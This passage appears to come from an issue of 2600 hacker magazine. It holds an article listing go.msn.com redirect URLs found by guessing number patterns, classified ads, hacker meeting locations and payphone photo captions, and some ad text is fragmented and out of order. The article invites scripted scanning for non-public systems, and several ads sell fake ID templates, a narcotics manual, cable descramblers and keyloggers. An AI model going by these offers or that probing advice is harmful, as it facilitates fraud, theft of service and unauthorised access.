For example, a Dell system sometimes defaults to the homepage http://dellnet.msn.com/ which uses a custom module in the msn system to deliver Dell information. I found this both annoying and interesting. After a little reverse engineering, I discovered that you can either go to these sites directly or you can be redirected to these sites from http://go.msn.com/ by using the proper URL parameters. It turns out that it redirects to a specific page customized to a specific company or group based on the parameters passed via the URL. For example, not only can you type in the direct dellnet address listed above, but you can also use the redirected http://go.msn.com/ address listed below to get to the same place. I decided to hammer through some patterns and see what other sites offer custom services. The results are listed below.

URL

http://go.msn.com/0/0/1.asp
http://go.msn.com/0/0/3.asp
http://go.msn.com/0/1/0.asp
http://go.msn.com/0/1/1.asp
http://go.msn.com/0/1/2.asp
http://go.msn.com/0/3/1.asp
http://go.msn.com/0/3/2.asp
http://go.msn.com/0/3/3.asp
http://go.msn.com/0/3/4.asp
http://go.msn.com/0/3/5.asp
http://go.msn.com/0/3/6.asp
http://go.msn.com/0/3/7.asp
http://go.msn.com/0/3/8.asp
http://go.msn.com/0/3/9.asp
http://go.msn.com/0/3/10.asp
http://go.msn.com/0/3/11.asp
http://go.msn.com/0/3/12.asp
http://go.msn.com/0/3/13.asp
http://go.msn.com/0/3/14.asp
http://go.msn.com/0/3/15.asp
http://go.msn.com/0/3/16.asp
http://go.msn.com/0/3/17.asp
http://go.msn.com/0/3/18.asp
http://go.msn.com/0/3/19.asp
http://go.msn.com/0/3/20.asp
http://go.msn.com/0/5/1.asp
http://go.msn.com/0/6/1.asp
http://go.msn.com/0/7/1.asp
http://go.msn.com/0/8/1.asp

Company/Site

Microsoft - IE5.5 SP1 download (redirects to an apology page)
Dell - "ebar" (error page, apparently this no longer exists)
MSN - MSN Member
MSN - Canadian version
MSN - My MSN (customised page)
Best Buy
Charter Communications - Broadband ISP Home page
Dell
Disney
Best Buy
Charter Communications - Broadband ISP Home page
Dell
Disney
Staples
Verizon
QWEST
Staples
United Airlines
Verizon
Verizon - Direct link to MSN Groups
Verizon - Direct link to MSN Shopping
Verizon - Direct link to MSN Money Central
Verizon - Direct link to My MSN (customized page)

This was done manually during a training session where I sat in the back of the class unchallenged and bored to tears. I only went through some limited ranges in my testing. It could easily be scripted to check for a larger series of numbers. A couple of them seemed interesting, such as the "ebar" page. Maybe there are some other software download pages that could be interesting. Maybe there are ways to login or access customized systems that weren't intended for public consumption. Just think of how many other sites may be out there on the web that could work the same way. See what others you can find!

Happenings

THE FIFTH HOPE will take place at New York City's Hotel Pennsylvania from July 9th to the 11th. This will be a very special conference, marking the 20th anniversary of 2600 and the 10th anniversary of the First HOPE. There's still time to get involved and become a speaker or help to organize this historic event. If you want to be part of this, go to www.hope.net and follow the links for speakers and/or volunteers. See you there!

For Sale

HOW TO BE ANONYMOUS ON THE INTERNET. Easy to follow lessons on achieving Internet anonymity, privacy, and security. The book's 20 chapters cover 1) simple proxy use for WWW; 2) how to send and receive e-mail anonymously; 3) use SOCKS proxies for IRC, ICQ, NNTP, SMTP, HTTP; 4) web based proxies - JAP, Multiproxy, Crowds;
5) do-it-yourself proxies - AnalogX, Wingates; 6) read and post in newsgroups (Usenet) in complete privacy; 7) for pay proxies. Learn how to hunt for, find, and utilize all types of proxies, clean up your browsers, clean up your whole Windows OS. This professionally written but non-technical jargon filled book is geared towards the beginner to advanced readers and the average Internet user. The book lessons are on a CD in easy to read HTML interface format with numerous illustrations throughout. Send $20 (I'll pay S/H) to Plamen Petkov, 1390 E Vegas Valley Dr. #40, Las Vegas, NV 89109. Money orders, personal checks, cash accepted.

THE IBM-PC UNDERGROUND ON DVD. Topping off at a full 4.2 gigabytes, ACiD presents the first DVD-ROM compilation for the IBM-PC underground scene entitled "Dark Domain." Inside is an expansive trove of files dating as far back as 1987 up to the close of 2003; from artpacks to loaders and cracktros to magazines, plus all the necessary programs for browsing them. If you ever wanted to see a lost JED ANSImation display at 2400 baud, here's your chance. For order details and more information please consult http://www.darkdomain.org/

AFFORDABLE AND RELIABLE LINUX HOSTING. Kaleton Internet provides affordable web hosting based on Linux servers. Our hosting plans start from only $4.95 per month. This includes support for Python, Perl, PHP, MySQL, and more. Privacy is guaranteed and you can pay by E-Gold, paypal, or credit card. http://www.kaleton.com

DRIVER'S LICENSE BAR-BOOK and "fake" ID templates. Includes photos, templates, and information on all security features of every single American and Canadian drivers' licenses. Including information on making "fake" ID's on PVC cards, laminating, making holograms, magnetic stripes, software, and more to make your very own license! Send $25 cash in US funds or an international money order in US funds made out to R J Oit and mailed to Driver's Bar Book, PO Box 2306, Station Main, Winnipeg,
Manitoba, R3C 4A6, Canada. Order now and get FREE laminates with every order! We ship worldwide free!

ONLINE RETAILER OF COMPUTER PRODUCTS is also a 2600 subscriber! 60,000 different computer products from components to complete systems, laptops, PDAs, cables, RAM, and media all available online at http://www.digitaleverything.ca. Worldwide shipping is no problem. Just mention you are a subscriber and I'll give you better prices too. Contact Dave at sales@digitaleverything.ca for more info.

HACKER LOGO T-SHIRTS AND STICKERS. Show your affiliation with the hacker community. Get t-shirts and stickers emblazoned with the Hacker Logo at HackerLogo.com. Our Hacker Logo t-shirts are high quality Hanes Beefy-Ts that will visibly associate you as a member of the hacker culture. Our stickers are black print on sturdy white vinyl, and work well on notebooks, laptops, bumpers, lockers, etc.

PHONE HOME. Tiny, sub-miniature, 7/10 ounce, programmable/reprogrammable touch-tone, multi-frequency (DTMF) dialer which can store up to 15 touch-tone digits. Unit is held against the telephone receiver's microphone for dialing. Press "HOME" to automatically dial the stored digits which can then be heard through the ultra miniature speaker. Ideal for E.T.'s, children, Alzheimer victims, lost dogs/chimps, significant others, hackers, and computer wizards. Give one to a boy/girl friend or to that potential "someone" you meet at a party, the supermarket, school, or the mall; with your pre-programmed telephone number, he/she will always be able to call you! Also, ideal if you don't want to "disclose" your telephone number but want someone to be able to call you locally or long distance by telephone. Key ring/clip. Limited quantity available. Money order only. $16.95 + $1.55 S/H. Mail or-

formation package by visiting www.paranoidpublications.com and clicking on "Authors." We do not accept or respond to e-mails, faxes, or telephone calls from prospective authors.
No matter how good it sounds on the phone, we have to see it in print. While you're there, check out our newest book - The Preparatory Manual of Narcotics. Author Jared B. Ledgard shows us how to prepare and handle numerous hazardous controlled substances of an intoxicating nature. Written in plain English, this manual is simple enough for the common man to comprehend yet advanced enough to hold the attention of even the most accomplished chemist. All of our titles are perfect bound and printed on acid-free, high quality paper that is 25% recycled, 10% of which is post consumer content. Enter coupon code "spring2600" (without the quotes) for 10% off your order. Visa, MasterCard, American Express, Discover, JCB, and old fashioned checks and money orders are welcomed. Due to much fraud, we no longer accept eChecks. No orders by telephone, please. Customer service and product information 800-AHI-8995 or 219-326-6662.

SIZE DOES MATTER! The Twin Towers may be gone forever but a detailed image still exists of the massive 374-foot radio tower that was perched atop One World Trade Center. This high-quality glossy color poster is available in two sizes (16" x 20" and 20" x 30") and makes a spectacular gift for engineers, scientists, radio and television buffs, or anybody who appreciates a unique, rarely seen view of the World Trade Center. Visit www.wtc-poster.us for samples and to order your own poster.

WIRELESS SECURITY PERSPECTIVES. Monthly, commercial-grade information on wireless security. Learn how to protect your cellular, PCS, 3G, Bluetooth, or WiFi system from 2600 readers. Subscriptions start at $350 per year. Check us out at http://cnp-wireless.com/wsp.html.

CABLE TV DESCRAMBLERS. New (2) Each $74 + $5.00 shipping, money order/cash only. Works on analog or analog/digital cable systems. Premium channels and possibly PPV depending on system.
Complete with 110vac power supply. Purchaser assumes sole responsibility for notifying cable operator of use of descrambler. Requires a cable TV converter (i.e., Radio Shack) to be used with the unit. Cable connects to the converter, then the descrambler, then the output goes to TV set tuned to channel 3. CD 9621 Olive, Box 28992-TS, Olivette Sur, Missouri 63132. Email: cabledescramblerguy@yahoo.com

LEARN LOCK PICKING. It's EASY with our book. Our 2nd edition adds lots more interesting material and illustrations. Learn what they don't want you to know. Any security system can be beaten, many times right through the front door. Be secure, learn the secrets and weakness of today's locks. If you want to get where you are not supposed to be, this book could be your answer. Explore the empowering world of lock picking. Send twenty bucks to Standard Publications, PO Box 2226HQ, Champaign, IL 61825 or visit us at www.standardpublications.com/direct/2600.html for your 2600 reader price discount.

CAP'N CRUNCH WHISTLES. Brand new, only a few left. THE ORIGINAL WHISTLE in mint condition, never used. Join the elite few who own this treasure! Once they are gone, that is it - there are no more! Keychain hole for keyring. Identify yourself at meetings, etc. as a 2600 member by dangling your keychain and saying nothing. Cover one hole and get exactly 2600 hz, cover the other hole and get another frequency. Use both holes to call your dog or dolphin. Also, ideal for telephone remote control devices. Price includes mailing. $49.95. Not only a collector's item but a VERY USEFUL device to carry at all times. Cash or money order only. Mail to: WHISTLE, P.O. Box 11562-ST, Clt, Missouri 63105.

REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the like? For a copy of Infiltration, the zine about going places you're not supposed to go, send $3 cash to PO Box 13, Station E, Toronto, ON M6H 4E1, Canada.

TAP/YIPL.
The original phreaking and hacking zines! All original back issues on CD-ROM. Only $5 including postage! Write for a free catalog of the best underground CD-ROMS! Whirlwind, Box 8619, Victoria BC, V8W 3S2, Canada.

AT LAST AN ACCURATE DESCRIPTION OF THE BELIEFS AND BEHAVIOR OF HACKERS! Social Inquiry offers a research report produced by Bernhardt Lieberman, emeritus professor from the University of Pittsburgh and Director of Social Inquiry, his own social research firm. Professor Lieberman held appointments in the Departments of Sociology and Psychology at the University of Pittsburgh. He conducted a detailed interview of hackers in Pittsburgh and administered five questionnaires to them: a hacker motivation questionnaire, a hacker ethic questionnaire, an attitude toward the law scale, a liberalism-conservatism scale, and a personality questionnaire designed to deal with the myth of the hacker as a social misfit.

der to: PR. 331 N. New Balias Road, Box 410802, CRC, Missouri 63141

SEEKING MANUSCRIPTS FOR PUBLICATION. The Paranoid Publications Group is currently accepting unsolicited, unpublished manuscripts for consideration. For complete information, download our electronic author's in-

Professor Lieberman attended H2K2, observed the behavior of hackers in convention, and administered the five questionnaires to hackers attending H2K2. The report also contains a content analysis of 2600. The report presents a description of the beliefs and behavior of hackers produced by these methods of inquiry. The report is neither a condemnation nor a whitewash of hackers, nor does it justify the actions of criminal justice systems and the disciplinary actions of school administrators.
It is designed to offer a more accurate picture of hackers than the pictures presented by the mass media and the criminal justice systems. The report recommends that the desire of hackers to learn about computers, computing, and technology should be channeled into constructive ends, as much as that is possible. The report is 140 pages long and contains 55,000 words. Professor Lieberman received no grant or contract money to do this work; he did the work using his own money and was, and is, beholden to no one. To get a copy of the report send a check or money order for $23.50 + $4 JO ($6.00 outside North America) for shipping (in U.S. dollars) payable to Social Inquiry, 627 Beverly Road, Pittsburgh, PA 15243. Those fortunate enough to have institutional funds to pay for the report are invited to send a purchase order. (Federal tax ID number 25-1377234.) Professor Lieberman can be reached at 412.343.2508. His website is www. tclcrmna.com/-blieber

Help Wanted

GOOD COMMUNICATORS NEEDED to promote revolutionary sender pays spam elimination infrastructure. E-mail davtdnicol@pay2send.com with "2600 marketplace" in your message. Lifetime residual earnings potential.

CREDIT REPORT HELP NEEDED. Need some assistance removing negative items off credit reports. Will pay. All agencies. Please respond to nkysightti spaceman com.

HIRING PROFESSIONAL INTERNET CONSULTANTS with job references only for the following: website security, performance tuning, and marketing for online magazine. Please send your bio and resume to: lbhumworth@yahoo.com - you can work from home, but should live in (or around) NYC, as you will need to attend a meeting or two.

Wanted

HAVE KNOWLEDGE OF SECURITY BREACHES at your bank? Heard rumors of cracked customer databases? Know there are unaddressed vulnerabilities in a retailer's credit card network, but its management doesn't know or care? We want your tips.
We are a business newsletter focusing on security issues in the financial industry: IT security, privacy, regulatory compliance, identity-theft and fraud, money-laundering. Wherever criminal activity meets banks, we are there. You can remain anonymous. (Note: we will not print rumors circulated by one person or group without obtaining supporting evidence or corroboration from other parties.) Contact b.inksecuritynews@yahoo.com or call 212-564-8972, ext. 102.

BUYING BOOKS AND MORE. Man interested in books related to hacking, security, phreaking, programming, and more. Willing to purchase reasonable books/offers. I do search Google! No rip-offs please. Contact me at lltda@atl.net.

FREE SOFTWARE DISTRIBUTION. I have a website (www.cloder.com, come check it out!) that has a fair amount of traffic. Mostly for debian and redhat cds. I am looking for hackers who have made their own interesting programs and wish to share. If you have some really interesting apps I can give you (for free!) a page or a sub domain. I am looking to assist the open source movement and the hacker community. You can email me at clixler@hotmail.com. Please place "download" in the subject heading. All interesting ideas welcome. Eric Loder.

NEED DIAL IT HACKING INFO (steps involved, current dial ups, etc.). Also looking for places on the Internet where I can get unlisted phone numbers for free. Please contact me at btllm2@prodig> net

IF YOU DON'T WANT SOMETHING TO BE TRUE, does that make it propaganda? When we're children and we don't want to listen, we put our hands over our ears. As we grow up, we create new ways to ignore things we don't want to hear. We make excuses. We look the other way. We label things "propaganda" or "scare tactics." But it doesn't work. It doesn't make the truth go away. Government and corporate MIND CONTROL PROGRAMS are used to intimidate, torture, and murder people globally. It may not be what you want to hear. But that doesn't make it any less true.
Please visit and support John Gregory Lambros by distributing this ad to free classified advertising sites and newsgroups globally. www.brazilboycon.org THANK YOU!

Services

INTELLIGENT HACKERS UNIX SHELL. Reverse.Net is owned and operated by intelligent hackers. We believe every user has the right to online security and privacy. In today's hostile anti-hacker atmosphere, intelligent hackers require the need for a secure place to work, without big-brother looking over their shoulder. We provide highly filtered DoS protection. Our main server is a P3 1.2 ghz machine, 1.5 gigs of ram, 512 megs of swap, 40 gig EIDE, with complete online "privacy." Compile your favorite security tools, use ssh, stunnel, nmap, etc. Affordable pricing from $10/month, with a 14 day money back guarantee. http://www.reverse.net/

Announcements

OFF THE HOOK is the weekly one hour hacker radio show presented Wednesday nights at 7:00 pm ET on WBAI 99.5 FM in New York City. You can also tune in over the net at www.2600.com/offthehook or on shortwave in North and South America at 7415 khz. Archives of all shows dating back to 1988 can be found at the 2600 site, now in mp3 format! Shows from 1988-2003 are now available on DVD! Details on page 9. Your feedback on the program is always welcome at oth@2600.com.

HACKERSHOMEPAGE.COM. Your source for keyboard loggers, gambling devices, magnetic stripe reader/writers, vending machine defeaters, satellite TV equipment, lockpicks, etc... (407) 650-2830.

CHRISTIAN HACKERS' ASSOCIATION: Check out the webpage http://www.christianhacker.org for details. We exist to promote a community for Christian hackers to discuss and impact the realm where faith and technology intersect for the purpose of seeing lives changed by God's grace through faith in Jesus.

VMYTHS.COM AUDIO RANTS are available free of charge to computer talk shows. These short and often hilarious MP3s dispel the hysteria that surrounds computer security.
One former White House computer security advisor hates these rants (and we don't make this claim lightly). Check out Vmyths.com/news.cfm for details.

HACKERMIND: Dedicated to bringing you the opinions of those in the hacker world, and home of the ezine Frequency. Visit www.hackermind.net for details.

DO YOU WANT ANOTHER PRINTED MAGAZINE that complements 2600 with even more hacking information? Binary Revolution is a magazine from the Digital Dawg Pound about hacking and technology. Specifically, we look at underground topics of technology including: Hacking, Phreaking, Security, Urban Exploration, Digital Rights, and more. For more information, or to order your printed copy online, visit us at http://www.binrev.com/ where you will also find instructions on mail orders. Welcome to the revolution!

Personals

VINTAGE COMPUTER RESOURCES FOR RESEARCH. VintageTech provides a wide variety of computer historical related services for business and academia. We provide: support services for legal firms for computer and software patent litigation and prior art research; props and consulting for movie or film production and photography studios requiring period authentic computers and computer related items; data recovery and conversion from old and obsolete data media to modern media; appraisals of vintage computer items for sale, charitable donation, or insurance valuations; sales brokering of vintage computers and related items; general computer history consulting and research. VintageTech maintains an extensive archive of computers, software, documentation, and an expansive library of computer related books and magazines. Visit us online at http://www.vintagetech.com or call +1 925 294 5900 to learn more about the services we provide.

PAY2SEND.COM is an e-mail forwarding service that only forwards messages from whitelisted contacts or people who pay you to receive from them, using a patent-pending identity technique. Sign up via our web page form.

I AM A 22 YEAR OLD KNOWLEDGE SEEKER that has been incarcerated for the past 2 years and have 2 years to go until my release. I am looking for anyone who has the time to teach or print tutorials for me to learn from. I am interested in any field such as phreaking, cracking, programming OpenBSD, or anything else to keep my mind on the right track while I do my segregation time. I also would enjoy some penpals if anyone has time. I will answer ALL letters promptly. If interested please write me at: Joshua Steelsmith #113667, WVCF-IDOC, PO Box 1111, Carlisle, IN 47838.

STORMBRINGER'S 411: My Habeas Corpus (2255) was just denied so I'm in for the 262 month long haul. Am trying to get back in contact with the D.C. crew, Roadie, Joe630, Alby, Protozoa, Ophic, Professor, Dr. Freeze, Mudge, Vox Buster, Panzer, and whoever else wants to write. PT Barnum, I lost your 411. Wireless, ham, data over radio is my bag. Write: William K. Smith, 44684-083, FCI Cumberland Unit A-1, PO Box 1000, Cumberland, MD 21501 (web: www.stormbringer.tv)

PRISON REALLY SUCKS! Known as Alphabits for many years. Help me pass the time in here and write to me. Only 2 more years left and I am going crazy without any mental stimulation. I welcome letters from anyone and will reply to all. Jeremy Cushing #J51130, Centinela State Prison, P.O. Box 911, Imperial, CA 92251-0911

RESOURCE MAN is looking for more addresses (snail mail). Please send any addresses of the following: book clubs, subscription services, newspapers, computer/hacking magazines, and any foreign addresses which are a special delight. The further away the better. Also, I am a manga/anime fanatic (dbz, Digimon, Outlaw Star, Chobits, Tenchi Muyo, etc.). Please send any related information to: Dumyel Sigsworth #1062882, PO Box 2000, Colorado City, TX 79512. Will respond if desired.

ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don't even think about trying to take out an ad unless you subscribe!
All ads are free and there is no amount of money we will accept for a non-subscriber ad. We hope that's clear. Of course, we reserve the right to pass judgment on your ad and not print it if it's amazingly stupid or has nothing at all to do with the hacker world. We make no guarantee as to the honesty, righteousness, sanity, etc. of the people advertising here. Contact them at your peril. All submissions are for ONE ISSUE ONLY! If you want to run your ad more than once you must resubmit it each time. Don't expect us to run more than one ad for you in a single issue either. Include your address label or a photocopy so we know you're a subscriber. Send your ad to 2600 Marketplace, PO Box 99, Middle Island, NY 11953. Deadline for Summer issue

AUSTRALIA
Academy Cinema on Pulteney St. 8 pm.
Brisbane: Hungry Jacks on the Queen St. Mall (RHS, opposite Info Booth). 7 pm.
Canberra: Kt's Virtual Reality Cafe, 11 East RW, Civic. 7 pm.
Melbourne: Melbourne Central Shopping Centre at the Swanston Street entrance near the public phones.
Perth: The Merchant Tea and Coffee House, 183 Murray St. 6 pm.
Sydney: The Crystal Palace, front bar/bistro, opposite the bus station area on George Street at Central Station. 6 pm.

AUSTRIA
Graz: Cafe Haltestelle on Jakominiplatz.

BRAZIL
Belo Horizonte: Pelego's Bar at Assufeng, near the payphone. 6 pm.

CANADA
Alberta
Calgary: Eau Claire Market food court by the bland yellow wall (formerly the "milk wall").
British Columbia
Nanaimo: Tim Horton's at Comox & Wallace.
Vancouver: Pacific Centre Food Fair, one level down from street level by payphones. 4 pm to 9 pm.
Victoria: Eaton Center food court by A&W.
Manitoba
Winnipeg: Garden City Shopping Center, Center Food Court adjacent to the A & W restaurant.
New Brunswick
Moncton: Ground Zero Networks Internet Cafe, 720 Main St. 7 pm.
Ontario
Barrie: William's Coffee Pub, 505 Bryne Drive. 7 pm.
Guelph: William's Coffee Pub, 429 Edinbourgh Road. 7 pm.
Hamilton: McMaster University Student Center, Room 318. 7:30 pm.
Ottawa: Agora Bookstore and Internet Cafe, 145 Besserer Street. 6:30 pm.
Toronto: Food Bar, 199 College Street.
Quebec
Montreal: Bell Amphitheatre, 1000 Gauchetiere Street.

CZECH REPUBLIC
Prague: Legenda pub. 6 pm.

DENMARK
Aarhus: In the far corner of the DSB cafe in the railway station.
Copenhagen: Ved Cafe Blasen.
Sonderborg: Cafe Druen. 7:30 pm.

EGYPT
Port Said: At the foot of the Obelisk (El Missallah).

ENGLAND
Exeter: At the payphones, Bedford Square. 7 pm.
Hampshire: Outside the Guildhall, Portsmouth.
Hull: The Old Gray Mare Pub, opposite Hull University. 7 pm.
London: Trocadero Shopping Center (near Piccadilly Circus), lowest level. 7 pm.
Manchester: The Green Room on Whitworth Street. 7 pm.
Norwich: Main foyer of the Norwich "Forum" Library. 7:30 pm.
Reading: Afro Bar, Merchants Place, off Friar St. 6 pm.

FINLAND
Helsinki: Fenniakortteli food court (Vuorikatu 14).

FRANCE
Avignon: Bottom of Rue de la Republique in front of the fountain with the flowers. 7 pm.
Grenoble: Eve, campus of St Martin d'Heres.
Paris: Place de la Republique, near the (empty) fountain. 6 pm.

GREECE
Athens: Outside the bookstore Papaswtiriou on the corner of Patision and Stournari. 7 pm.

IRELAND
Dublin: At the phone booths on Wicklow Street beside Tower Records. 7 pm.

ITALY
Milan: Piazza Loreto in front of McDonalds.

JAPAN
Tokyo: Linux Cafe in Akihabara district. 6 pm.

NEW ZEALAND
Auckland: London Bar, upstairs, Wellesley St, Auckland Central. 5:30 pm.
Christchurch: Java Cafe, corner of High St and Manchester St. 6 pm.
Wellington: Load Cafe in Cuba Mall. 6 pm.

NORWAY
Oslo: Oslo Sentral Train Station. 7 pm.
Tromsoe: The upper floor at Blaa Rock Cafe. 6 pm.
Trondheim: Rick's Cafe in Nordregate. 6 pm.

SCOTLAND
Glasgow: Central Station, payphones next to Platform 1. 7 pm.

SLOVAKIA
Bratislava: at Polus City Center in the food court (opposite side of the escala-

SOUTH AFRICA
Johannesburg (Sandton City): Sandton food court.

UNITED STATES
Florida
Ft. Lauderdale: Broward Mall in the food court.
Orlando: Fashion Square Mall Food Court between Hovan Gourmet and Manchu Wok. 6 pm.
Georgia
Atlanta: Lenox Mall food court. 7 pm.
Hawaii
Honolulu: Coffee Talk Cafe, 3601 Waialae Ave. Payphone: (808) 732-9184.
Idaho
Boise: BSU Student Union Building, upstairs from the main entrance. Payphones: (208) 342-9700, 9701.
Pocatello: College Market, 604 South 8th Street.
Illinois
Chicago: Union Station in the Great Hall near the payphones.
Indiana
Evansville: Barnes and Noble cafe at 624 S Green River Rd.
Ft. Wayne: Glenbrook Mall food court in front of Sbarro's. 6 pm.
Indianapolis: Borders Books on the corner of Meridian and Washington.
South Bend (Mishawaka): Barnes and Noble cafe, 4601 Ri
Iowa
Ames: Santa Fe Espresso, 116 Welch Ave.
Louisiana
Baton Rouge: ... LSU ... next to ... Payphone numbers: (225) 387-9520,
North Carolina
Raleigh: Crabtree Valley Mall food court in front of the McDonald's.
Wilmington: Independence Mall food court.
Ohio
Akron: Arabica on W. Market Street, intersection of Hawkins, W. Market, and Exchange.
Cleveland: University Circle Arabica, 11300 Juniper Rd. Upstairs, turn right, second room on left.
Columbus: Convention Center (downtown), south (hotel) half, carpeted payphone area, near restrooms, north of food court. 7 pm.
Dayton: At the Marions behind the Dayton Mall.
Oklahoma
Oklahoma City: The Magic Lamp in the Lakeside Shopping Center near the corner of N. May Ave. and NW 73rd St.
Tulsa: Woodland Hills Mall food court.
Oregon
Portland: Backspace Cafe, 115 NW 5th Ave. 6 pm.
Pennsylvania
Allentown: Panera Bread on Route 145 (Whitehall). 6 pm.
Philadelphia: 30th Street Station, under Stairwell 7 sign.
Pittsburgh: William Pitt Union building on the University of Pittsburgh campus by the Bigelow Boulevard entrance.
South Carolina
Charleston: Northwoods Mall in the hall between Sears and Chik-Fil-A.
South Dakota
Sioux Falls: Empire Mall, by Burger King.
Tennessee
Knoxville: Borders Books Cafe across from Westown Mall.
Memphis: Cafe inside Bookstar - 3402 Poplar Ave. at Highland. 6 pm.
Nashville: J-J's Market, 1912 Broadway.
Texas
Austin: Dobie Mall food court.
Dallas: Mama's Pizza, Campbell & Preston. 7 pm.
San Antonio: North Star Mall food court.
Utah
Salt Lake City: ZCMI Mall in The Park Food Court.
Vermont
Burlington: Borders Books at Church St. and Cherry St. on the second floor of the cafe.
Virginia
Arlington: (see District of Columbia)
Virginia Beach: Lynnhaven Mall on Lynnhaven Parkway. 6 pm.
Washington
Seattle: Washington State Convention Center. 6 pm.
Wisconsin
Madison: Union South (227 N. Randall Ave.) on the lower level in the Copper Hearth Lounge.
Milwaukee: The Node, 1504 E. North

All meetings take place on the first Friday of the month. Unless otherwise noted, they start at 5 pm local time. To start a meeting in your city, leave a message & phone number at (631) 751-2600 or send email to meetings@2600.com.

Come and visit our website and see our vast array of payphone photos that we've compiled! http://www.2600.com

And yet, people in Sao Paulo don't seem to be in the least bit concerned with this new life form. If phones like this started to sprout in American streets, there would be massive panic. They look like some kind of alien.

If you're really daring, this is what one of these monsters looks like as you approach. This one was seen in Campinas.

And yes, the phone itself, which doesn't seem to really match its spacey surroundings.

Photos by Anonymous

Look on the other side of this page for even more photos!

From the Northwest corner of Tiananmen Square in Beijing (People's Republic ).

And here we have the Southwest corner.

Photos by Tim Fraser